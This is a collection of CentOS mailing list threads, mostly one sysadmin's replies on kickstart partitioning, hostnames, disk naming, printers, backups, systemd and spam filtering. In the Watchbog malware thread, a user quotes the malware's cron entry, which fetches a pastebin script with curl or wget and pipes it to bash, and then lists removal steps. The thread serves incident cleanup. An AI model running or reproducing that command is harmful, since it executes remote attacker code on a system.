On 2019-05-13 07:38, Nux! wrote: Hi, The $home of root is /root, just copy it there. It is $HOME not $home ;-) Valeri -- Sent from the Delta quadrant using Borg technology! Nux! www.nux.ro - Original Message - From: "Bee.Lists" To: "CentOS mailing list" Sent: Monday, 13 May, 2019 13:28:24 Subject: [CentOS] root .bash_profile? Hi folks. Just wondering how I can implement an automatic .bash_profile for root. I have to load my user .bash_profile every time I get into root, and I would like a better solution. There is no /home/ for root, so I’m a bit confused if this is even allowed. Any insight appreciated. Cheers, Bee ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Firefox esr repackage
On 2019-05-10 04:29, wwp wrote: Hello Nux!, On Fri, 10 May 2019 10:12:59 +0100 (BST) Nux! wrote: I maintain a desktop oriented repo for CentOS and last I checked a year or so ago, I got over 150k+ unique IPs with yum user agent downloading stuff from it. It's a bit anecdotal as perhaps not all are actual desktop users and some users were using multiple IPs (dhcp), but it shows there are quite a few users out there running CentOS for desktop purposes. Few only? I'm a nux repo user for a long time, and heard of it from forums and official pages. It sounds quite obvious to me that CentOS is used for desktop purposes in addition to server or dev systems. The Department of University I work for does use CentOS for workstations (those of professor and graduate students) and group number crunchers. So, indeed it is "desktop" system. Servers... Hm, we fled from CentOS to FreeBSD. Valeri There are desktop focused distros out there who do not even reach this kind of numbers. How many active users do you think Mageia or Linux Mint have? Regards, ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] kickstart compat C7 -> C8
On 2019-05-08 15:05, Stephen John Smoogen wrote: On Wed, 8 May 2019 at 13:48, Valeri Galtsev wrote: On 2019-05-08 12:28, Stephen John Smoogen wrote: On Wed, 8 May 2019 at 13:24, mark wrote: Yep. Minimum for that is going to be about the same as your RESCUE. The other would just be to confirm that the sda has space and nothing still on it which it was trying to work around. In CentOS releases 5 --> 6 --> 7 the demand for /boot size doubles if not triples with each release... Otherwise one day you may fill it up before number of kernels will be such that kernel update will remove oldest kernel. And _we_ called Windows 2000 "bloated pig" when it was released... Sigh. Software seems to grow to the maximum space it can occupy. Of course, this is true. I do remember big upgrade: 40 MB hard drive replacing 20 MB one. Still, during the same decade an a half covering CentOS releases I mentioned, on my FreeBSD boxes /boot grew up less than twice, whereas on my CentOS boxes it grew up at least 5 times. I safely run CentOS 5 through its whole lifespan with /boot as small as 200MB. On CentOS 7 I make /boot 3 GB (maybe slight overkill, but boxes with 1 GB went into /boot size issue after several kernel updates). But what one can do: Linux kernel has a lot of stuff that, hmm..., one can probably live without, and what comes with Linux distributions covers widest variety of hardware it will run on ;-) Valeri PS Yes, I run and programmed for machines with 4 - 16 Kb of RAM, and now administer machine with almost 1 TB of RAM. Now you can pretty much pinpoint my age ;-) I think in 1989 we were complaining about BSD not being able to fit on our VAX 750's boot drive anymore and we needed to put in a 40MB drive system instead. I expect by the 2040's we will be looking at petabyte drives and wondering how we can fit anything on it. Valeri mark ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] kickstart compat C7 -> C8
On 2019-05-08 12:28, Stephen John Smoogen wrote: On Wed, 8 May 2019 at 13:24, mark wrote: Leon Fauster via CentOS wrote: Hi all, I still use the following kickstart partition scheme for C7 installations (via virt-install): Briefly, fixed size for /root and /boot, and the rest is filled up for /srv. The same kickstart (despite that c7 uses vda, f29 uses sda) doesn't work with Fedora29 (EL8). I get a "device is too small for new format" error. Any hints? part /RESCUE --fstype="ext4" --ondisk=sda --size=1280 --label=RESCUE part /boot --fstype="ext4" --ondisk=sda --size=512 --label=BOOT part pv.0104 --fstype="lvmpv" --ondisk=sda --grow volgroup ee --pesize=4096 pv.1974 logvol / --fstype="ext4" --size=3072 --encrypted --label="ROOT" --name=00 --vgname=ee logvol /srv --fstype="ext4" --percent=100 --grow --encrypted --label="SRV" --name=01 --vgname=ee If I'm reading that correctly - haven't worked on a kickstart in years - I'd start by increasing root to 1024 (1M) for /boot. Yep. Minimum for that is going to be about the same as your RESCUE. The other would just be to confirm that the sda has space and nothing still on it which it was trying to work around. In CentOS releases 5 --> 6 --> 7 the demand for /boot size doubles if not triples with each release... Otherwise one day you may fill it up before number of kernels will be such that kernel update will remove oldest kernel. And _we_ called Windows 2000 "bloated pig" when it was released... Sigh. Valeri mark ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] RHEL 8 released
On 2019-05-07 11:00, rai...@ultra-secure.de wrote: Am 2019-05-07 17:51, schrieb Fabian Arrotin: On 07/05/2019 16:23, Alessandro Baggi wrote: Il 07/05/19 16:07, Rich Bowen ha scritto: This morning Red Hat announced the general availability of Red Hat Enterprise Linux 8. More details at https://www.redhat.com/en/about/press-releases/red-hat-enterprise-linux-8-every-enterprise-every-cloud-every-workload?sc_cid=701f201OIIOAA4 Hi Rich, thank you for the great news. When c8 will be released? When epel repository will be usable with C8? Thanks in advance Please let's stop trolling this channel already .. we're busy on it, so no need to ask in loop ... You forgot to preempt the "But why didn't you start with the betas?"-question. ;-) I am mot in the CentOS team, and I am not going to bug them about new release. I know they are busy on that task as they always have been. I decided to just express my gratitude to CentOS team for the great thing we all enjoy using! Valeri RHEL8 is available, for sale, right now. I'm sure that if a business case can be made, RHEL8 is worth it. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] What happened if install a el7 package on a el6 system
On 2019-05-07 04:50, Stephen John Smoogen wrote: On Tue, 7 May 2019 at 04:06, wuzhouhui wrote: Hi, Recently, I encountered a interesting phenomenon that CentOS 6.3 running as normal even if I (my colleague, actually) installed a kernel that build for CentOS 7.x (e.g. kernel-3.10.0-327.el7.x86_64.rpm). I found kernel is mismatch accidentally when I using "uname -r" to check kernel version. So my question is what the harmness we will get if I install a el7 rpm into a el6 system? Many CentOS-7 packages will not install because they will need dependencies that the EL-6 does not have. The kernel is different because it is mostly self-contained and meant to be parallel installed. In most cases, it should result in an unbootable system because the boot is going to be dracut+systemd bits and the EL-6 has none of that. +1 One needs to rebuild (recompile) everything that was not built on "mismatched" version of the system. And this will constitute correct "installation using old UNIX way". Otherwise you quite likely will have problems (even if they are hidden, i.e. if it appears to you that "all works"). One of examples would be using some library that is of different version than your extra software was compiled against. The library might be found, and successfully loaded at an execution time, but it may have different subroutine entry names or some missing which may be discovered only under some circumstances. At a compilation time the headers will be what provides necessary information... Anyway, understanding this will tell you apart as a sysadmin from "non-sysadmin" person ;-) Valeri Thanks. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] When should I reboot?
On 4/13/19 3:32 AM, Kenneth Porter wrote: I reboot when I yum update to a new kernel or systemd, which seems to come out about once a month. Should I do it for this week's glibc? Is that "core" enough to justify a reboot or should I wait for the next kernel update? This is basically your decision, and you seem to know what update brings. On an uptime note: in my observation since about the time kernel 2.6 was introduced Linux has to be rebooted on average every 45 days (either kernel or glibc security update). This was mainly what made me move my servers from CentOS Linux to FreeBSD. Valeri I know the glibc update was mainly to handle the new Japanese calendar, so that shouldn't affect my usage. So my question is more about how shared libraries work and whether anything bad would happen with different forks of running services (mainly the mail suite with dovecot and the various content scanners launched by sendmail) running different versions of the library based on when they were started. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Short or long hostname ?
On 4/10/19 8:23 AM, Simon Matter via CentOS wrote: Hi, For the last ten years or so, I've defined the short hostname in /etc/hostname and the FQDN in /etc/hosts. Now I wanted to double-check this information, which eventually led me to this page: * https://serverfault.com/questions/331936/setting-the-hostname-fqdn-or-short-name Now I admit I'm even more confused than before. Is there some reliable piece of information on this subject for CentOS ? IMHO for those having proper DNS in place, the hostname should be set to the FQDN in whatever place it is supposed to be set. I quite feel there is something wrong if the only place where the FQDN is listed is the /etc/hosts file. I'm not very happy with how the issue was handled in Linux and the different distributions in the last decades. Not to mention the inconsistency in the relevant man pages. Well, I am unhappy for about as long about /etc/hosts and how name resolution "should" happen which it doesn't, namely, if /etc/nsswitch.conf says hosts: files dns then ideally /etc/hosts should be used first, then nameservers. However (and this is true both for Linux and FreeBSD), some commands never look into /etc/hosts (e.g., command host), whereas some do use /etc/hosts (e.g., command ping). Valeri I found the info mentioned in the FreeBSD man pages quite helpful even if it has to be "translated" to Linux. See the excerpt of the mentioned man pages below. If you believe this is heresy to be posted here, please don't read it :-) Regards, Simon %>--- root@freebsd:~ # man hostname HOSTNAME(1) FreeBSD General Commands Manual HOSTNAME(1) NAME hostname - set or print name of current host system SYNOPSIS hostname [-f] [-s | -d] [name-of-host] DESCRIPTION The hostname utility prints the name of the current host. The super-user can set the hostname by supplying an argument; this is usually done in the initialization script /etc/rc.d/hostname, normally run at boot time. This script uses the hostname variable in /etc/rc.conf. ... root@freebsd:~ # man rc.conf RC.CONF(5)FreeBSD File Formats Manual RC.CONF(5) NAME rc.conf - system configuration information DESCRIPTION The file rc.conf contains descriptive information about the local host ... hostname (str) The fully qualified domain name (FQDN) of this host on the network. This should almost certainly be set to something meaningful, even if there is no network connection. If dhclient(8) is used to set the hostname via DHCP, this variable should be set to an empty string. Within a jail(8) the hostname is generally already set and this variable may absent. If this value remains unset when the system is done booting your console login will display the default hostname of "Amnesiac". ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] What files to edit when changing the sdX of hard drives?
On 2/28/19 10:04 PM, Jobst Schmalenbach wrote: On Thu, Feb 28, 2019 at 05:19:49PM +0100, Nicolas Kovacs (i...@microlinux.fr) wrote: Le 28/02/2019 à 04:12, Jobst Schmalenbach a écrit : I want to lock in the SDA/SDB/SDC for my drives In short : use UUIDs or labels instead of hardcoding /dev/sdX. I **KNOW** how to use UUID's ... this is NOT the reason why I am doing this! I *NEED* the order of the disks to be SDA(1st BIOS drive) SDB(2nd BIOS drive) SDC(3rd BIOS drive) and not SDA (1st BIOS drive) SDB(3rd BIOS drive) SDC (2nd BIOS drive). Reason: it stuffs up the use of grub2* utilities leaving behind a bunch of error messages. The SDA (1st BIOS drive) and SDB (2nd BIOS drive) are part of a MDADM raid(1) system. As soon as I plug in the third drive, the OS (or systemD) decides to put it into the SDB spot - I do NOT want that. When I the use any of the grub2 utils I end up with "missing drive" errors. Try to switch physical connections of second and third drives, then you most likely will have the correct "BIOS" order of physical drives. As, as far as I understand, the letters are assigned in the order the bus scan discovers drives (or - though less likely - in reverse order, at least reverse order once was for network interfaces, like discovered ones were pushed into stack, and then used in the order they were popped out of the stack). Valeri If I leave the drive out NO problem. I have managed twice to have the machine booting with the third drive as SDC, when that happens I I do not get any error messages. Jobst -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] What files to edit when changing the sdX of hard drives?
On 2/28/19 11:02 AM, Phelps, Matthew wrote: On Thu, Feb 28, 2019 at 11:52 AM mark wrote: Nicolas Kovacs wrote: Le 28/02/2019 à 04:12, Jobst Schmalenbach a écrit : I want to lock in the SDA/SDB/SDC for my drives In short : use UUIDs or labels instead of hardcoding /dev/sdX. https://wiki.archlinux.org/index.php/persistent_block_device_naming Yeah - I strongly believe in labels, given the fact that *no* one can remember a UUID mark ls -l /dev/disk/by-uuid (copy) (paste) I second Mark about filesystem labels. Labels you can read and type. UUIDs you can only copy and paste. Yes I did type them a few times, but... With upside there certainly comes downside of filesystem labels: if you are moving storage around you sometimes can hit the situation of having two identical labels. Which during last couple of decades I was able to get around. Valeri -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] HPlip Mark Roth/Jon LaBadie .
On 2/27/19 9:16 AM, mark wrote: Ger van Dijck wrote: The problems with HPlip goes on and on : I can not manage to establish a connection on WiFi with the HP4620 : I can print to the printer but not scan . Running hp-check results in cups is not running, hplip is not properly (HP) installed , xsane is not installed etc.. But I can assure you all this software is properly installed : Hp-check cannot detect the scanfunction on the HP4620. When running on USB cable all runs fine ! Maybe Bug 1683312 from Zdenek Dohnal (Red Hat) could be helpfull : I reported this bug . Hp does not support Unix/Linux applications ! Are they really so stupid to think that the world excist by MS and all other users do not need support: Arrogance or stupidity ? The inheritance of Carly. I was on the phone yesterday to HP - we just bought this printer, and it's under warranty. The engineer I spoke with told me he'd been there since '99, and he could tell me how to dissassemble and rebuild this brand new poster printer in his sleep. He does not, however, know software When I mentioned that HP has support in '12 for Macs - I was hoping to get the .ppd from the Mac package, as we had for the z3200ps in '12 - he told me they'd gotten rid of the Mac support team. Yes: no software support. I figure, I will add some rant about HP printer department. But first of all, I have to tell how great HP printer department was in the past. The past in my book is some 5 years ago and before that. About decade ago Xerox went really bad. They started making small changes to models, so tones were not compatible between them, thus they got rid of 3rd party vendors selling "compatible" toners for their printers (who will start production for something that covers only small number of potential customers). I didn't see an indication of really bad thing then, but some 5 years down the road they stopped making supplies for their printers, and no "compatibles" were being produced by anybody. So, all Xerox printers 5 years young (I hate to use word "old" here) were just junk. That day I said: I will never buy any Xerox anything, period. Yes I still agree with their old motto saying that they taught the world how to copy. By that time we also had a bunch of HP printers, and we happily kept getting newer models of HP printers. As a great example I would mention: about a year ago I almost retired HP LaserJet 4050 (b/w printer), that was heavily used in the Department for about 15 years, still working, still making prints of great quality, supplies for which still were produced by HP. So, HP was my life saver as far as printers go. Now finally to the rant: I recently started having issues, or rather single issue (jam of duplex jobs) with two of HP Color LaserJet CP4525 printers. Two, not just one. And now that I'm trying to find RELIABLE enterprise level printer for the department, I can not. It sounds like models HP manufacture now are not reliable. A few reliable ones were just discontinued recently. So, I'm dead in the water: what next printer to get for the department where it is used heavily? (yes, I included in consideration other manufacturers except Xerox). mark ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] what writes to /root/.cache/mesa ?
On 2/21/19 9:30 AM, Jonathan Billings wrote: On Wed, Feb 20, 2019 at 08:22:39AM -0600, Valeri Galtsev wrote: PS This gives me dejavu. A while ago when people started demanding to have google chrome browser installed on their workstations I had hard time to get rid of google's cron jobs that were writing where only root should - without explicit permission to do so. Dough. Somebody's software thinks it is smarter than everyone who uses it... "Machine learning" all the way ;-) Since I work at a university that uses Google Apps, we're asked to provide Google Chrome for all our users, but since the package is not very enterprise ready, I have to make several adjustments. One thing I do is put an 'exit 0' in /etc/default/google-chrome. This effectively stops most of the evil that the RPM does in its postscripts. (As a reminder, this is what the latest RPM does, https://paste.fedoraproject.org/paste/MS~7Fkr5AWYo7SAWAl8t6A ) I also manage private repos (with pulp) of the Google Chrome repos, in case I need to go back to a previous version, so having it overwrite my repositories is actually damaging. I also disable 'at' and the atd service on our workstations, and this RPM turns atd back on and schedules an at job to run the /etc/cron.daily/google-chrome script. It's an absurd RPM and Google should be ashamed of it. Thanks for your input, very instructive! Google is not ashamed of what it is doing. As one clever man said over decade ago: you don't need to recruit spies anymore, just roll out "free" services. And we all know, these "intelligence" agencies were never ashamed of whatever they have done. But as another clever man said: the people do deserve the government they have. Valeri -- ++++++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
[CentOS] what writes to /root/.cache/mesa ?
Dear All, I have several CentOS 7 machines (but not all of them) on which I have noticed that something gets written to /root/.cache/mesa every so often (once every several days). It is my understanding that mesa is related to GUI (X11), but on these machines (on neither of my machines, actually) root never logs in to GUI X11. I may have remote root logins with Xforwarding though. Hence my puzzle: what is that that writes to /root/.cache/mesa? Some, but not all of occasions seem to happen upon machine [re]boots. Thanks. Valeri PS This gives me dejavu. A while ago when people started demanding to have google chrome browser installed on their workstations I had hard time to get rid of google's cron jobs that were writing where only root should - without explicit permission to do so. Dough. Somebody's software thinks it is smarter than everyone who uses it... "Machine learning" all the way ;-) -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Centos 7 and backup solution
On 1/28/19 6:23 AM, Leon Fauster via CentOS wrote: Am 28.01.2019 um 10:50 schrieb Peter Eckel : Hi Alessandro, Why many users skip bacula? It is powerfull and very stable. It is very difficult to setup but if you know how it works it is simple. IMHO - as Kern (Bacula lead developer) is pushing Bacula forward I dont understand this too. It must be a misinformation about the current status of the project itself and competitors interests (Bareos). I used Bacula before I switched to Bareos. There was a point, however, when the open source release of Bacula became, to put it mildly, a bit too inactive for my taste. Inactive? Every 2 months a release (average): No rant intended... I believe, at some point there were no binary client for Windows system released for latest (at that point) bacula release. One could get that if one was a paid customer though, which my Department(s) WAS. That put _me_ off of upgrades to the server, and ultimately affected decision to switch over to bareos. (the very first thing I noticed: "status director" command in console in bareos was executed very fast compared my old bacula server. But that could be just me). That said, I want to express gratitude bacula team for the great job they were doing which really made my backup for two departments I work for just a wonder. Several times I had to do restore, and that saved my people who accidentally deleted some important stuff (whole version control place for some important software project with all history, releases, branches was one of them). https://sourceforge.net/p/bacula/mailman/bacula-announce/ Obviously I wasn't alone with this, because roughly at that time Bareos was forked from Bacula. <http://www.admin-magazine.com/Archive/2013/17/New-features-in-the-Bareos-Bacula-fork> Essentially, Bareos is an improved (at least IMHO) fork of Bacula, and unlike Bacuka it's fully open source. IIRC Bacula is also open source software. Remember RHEL binaries are not free available ... if you are referring to precompiled MS Windows binaries of Bacula). BTW Bacula is included in CentOS/RHEL albeit in an older version. This applies also for example to PHP and has the cause in the enterprise strategy of the distribution. So don't blame the wrong one. In this place I will just second what you said. Valeri Maybe a good reason to start a Backup SIG which provides a repository with current bacula packages? -- LF ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Centos 7 and backup solution
On 1/27/19 9:04 AM, Peter Eckel wrote: Hi Valeri, you mean, director and STORAGE daemon, right? File daemon _IS_ a client... yep. I noticed when klicking on 'send', as usual :-) And my apologies about sending it: I noticed you already corrected yourself when I hit "send" button. I should change to reading my mail beginning from latest to older ;-) Valeri Cheers, Peter. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Centos 7 and backup solution
On 1/27/19 8:14 AM, Peter Eckel wrote: Hi Alessandro, What if I will use bareos I will never get problem between version like happening today with bacula? difficult to say - I never ran into any upgrade issues with Bareos, but neither with Bacula while I was still using it. I could use newer bareos client on older bareos director? I always do it the other way around, i.e. upgrade the director/file daemon you mean, director and STORAGE daemon, right? File daemon _IS_ a client... Valeri and then the clients as time suits. No problems with that so far. Do you happen to be at FOSDEM? The Bareos team is going to be there, as usual: <http://www.bareos.org/en/news/bareos-fosdem-19.html> Cheers, Peter. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Centos 7 and backup solution
On 1/27/19 6:32 AM, Peter Eckel wrote: Hi Alessandro, what type of backup solution do you use on C7? the same as on most other operating systems: Bareos. +1 Valeri <http://www.bareos.org/en/> Bareos has some learning curve, but it's free, it's extremely reliable and flexible. I've been using it for years, after switching from its parent Bacula, which I've been using for years before that, and it has not failed me once when I needed it. Cheers, Peter. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] systemd
On 1/9/19 11:00 AM, Simon Matter via CentOS wrote: On Wed, Jan 09, 2019 at 10:43:38AM -0500, Steve Clark wrote: I am trying to understand what After= means in a unit file. Does it mean after the specified target is up and operational or only that the target has been started? I have something that needs postgres but postgres needs to be operational not just started. Sometimes it can take a bit for postgres to become operational. I believe that the postgresql service has Type=notify in it's service definition, which means that it will notify systemd when it is operational. This means that if you have a service that has After=postgresql.service, systemd should wait until after the postgresql service notifies systemd that it is operational before your service will be started. If your service is starting and unable to connect to postgresql, then I would say that's a bug in postgresql -- it shouldn't be notifying systemd that it is operational until it actually is. This is, in fact, one of the points why I'm very unhappy with systemd and the way it is implemented here and most likely in most distributions. Maybe things _could_ be done the right way with systemd, but it doesn't happen because it quickly starts to be very complex and it's a lot of work to do it for a complete distribution. It just doesn't happen - or at least did not happen in all the years since its introduction. Yes, introduction of systemd earned Linuxes a lot of refugees. I in my worst times feel maybe that was the goal of it. But then I think about a split of refugees from Linux to UNIX descendants (FreeBSD, NettBSD etc.) vs to MS products, and I am not quite certain if that was a goal (though I do remember MS alliance with RedHat...), but if it was the goal I doubt refugee split was in MS favor (though one says something is better than nothing). I hope, this didn't come as a rant, I should probably have used rant tags ;-) Valeri In this example, PG gets just started with "pg_ctl start" and that's it. Regards, Simon ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] CentOS 7.5 Linux box got infected with Watchbog malware
On 12/18/18 8:31 AM, mark wrote: Valeri Galtsev wrote: On 12/17/18 2:57 PM, Mauricio Tavares wrote: On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan wrote: Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently i am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malw areransomware.html to carry out the below steps and is done manually. 1)rm -fr /tmp/*timesyncc.service* 2)crontab -e -u apigee delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1 3)ps aux | grep watchbog kill -9 pidof watchbog Any suggestions or recommendations to find out how CentOS 7.5 Linux box got infected with Watchbog Malware. Is there any open source software which can do you have untampered log files? be installed on CentOS 7.5 Linux box to detect and prevent Malware? Standard compromise recovery procedure since forever is (your local policy my have slightly different order about notifications and similar): 1. back up all user data You should have been doing that all along. Do not exclude this from the [more or less] full list of standard compromise recovery routine I tried to outline. Even though you had to do backups all the time, backup at this point may have latest changes not present in latest routine backup. And you last had o restore something from your backup how many years ago? So your knowledge that that backup indeed works was tested years ago... First step, before you do anything else, is pull the hard drive, put it into a hot-swap or external bay, and dd the entire drive to an identical one. THAT goes to forensics. Indeed. Or adjust this part to "everything is hosted on hardware RAID device", for which you will have to boot off DVD, mount and dump all elsewhere for forensics. But! Forensics is different and sophisticated story, and when you learn in depth that the first thing you will learn is: Powering off the system, or even just disconnecting from the network may prevent you totally from learning several things about compromise. But this is really huge subject... Alternatively, pull the h/d, put in a new one, reset the BIOS to factory settings - that includes pulling the battery... *then* set what you need, and then build it new, and restore from backups. Why, yes, we did just do this, um, last year, after a compromise via a WordPress security hole. It did not manage to get to any other systems (we checked, and only a few run WordPress). And yes, preventing, no matter how tedious it may seem is orders of magnitude easier than recovering from compromise. So: secure the box. And update, update, update Valeri mark ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Spamassassin + Postfix : delete spam mail on the server ?
On 12/18/18 3:34 AM, Fabian Arrotin wrote: On 18/12/2018 08:08, Nicolas Kovacs wrote: Hi, My mail server is running on CentOS 7 with Postfix, Dovecot and Spamassassin. I get quite a lot of spam on a few accounts, and Spamassassin does its job fine. Spam mail is identified correctly, and it looks like there are no false positives, e. g. valid mail is never identified as spam. When a message is flagged as spam, the subject line is rewritten to begin with [SPAM]. Then, a filter in Mozilla Thunderbird is setup, and when a subject line begins with [SPAM] the message is directly sent to Trash. I've documented the whole configuration here: * https://blog.microlinux.fr/spamassassin-centos/ The problem with this setup is that spam mail is still delivered, and I need Thunderbird's filters to weed out incoming mail. And when I'm using my webmail (running SquirrelMail), my inbox is a tsunami of unread [SPAM] messages. So I'd like to go a step further and delete all messages flagged [SPAM] directly on the server. It doesn't look like Spamassassin provides this functionality. Did any of you guys succeed in doing this anyway? Cheers, Niki I've used for quite some time now a combination of postfix+SA+MailScanner for this, not delivering mails, but letting those in a quarantine, and using Mailwatch (http frontend) to let people release mail from the quarantine, etc .. Thanks, Fabian. I was looking for something like that for long time. I was using the above under amavisd-new. And as I didn't find GUI front-end ;-( I ended up using maia mailguard. By that point I switched servers to FreeBSD, and there is FreeBSD maia port which is being actively maintained by brilliant person, so that may be the best source to get maia from, not the main maia website. Thanks again, it looks like mailwatch does everything I needed (and found in maia): per user white/blacklists, other individual setting, quarantene release, etc. Valeri https://www.mailscanner.info/ https://mailwatch.org/ And the ansible role that I initially used for this on CentOS 7 : https://github.com/arrfab/ansible-role-mail-gateway Cheers, ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Spamassassin + Postfix : delete spam mail on the server ?
On 12/18/18 4:02 AM, Nux! wrote: Hi, HTH -- Sent from the Delta quadrant using Borg technology! I am just curios how much do they pay you for advertising them in all your posts to this mail list. Or what is different - non-monetary - incentive you have for doing so? Valeri Nux! www.nux.ro -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] CentOS 7.5 Linux box got infected with Watchbog malware
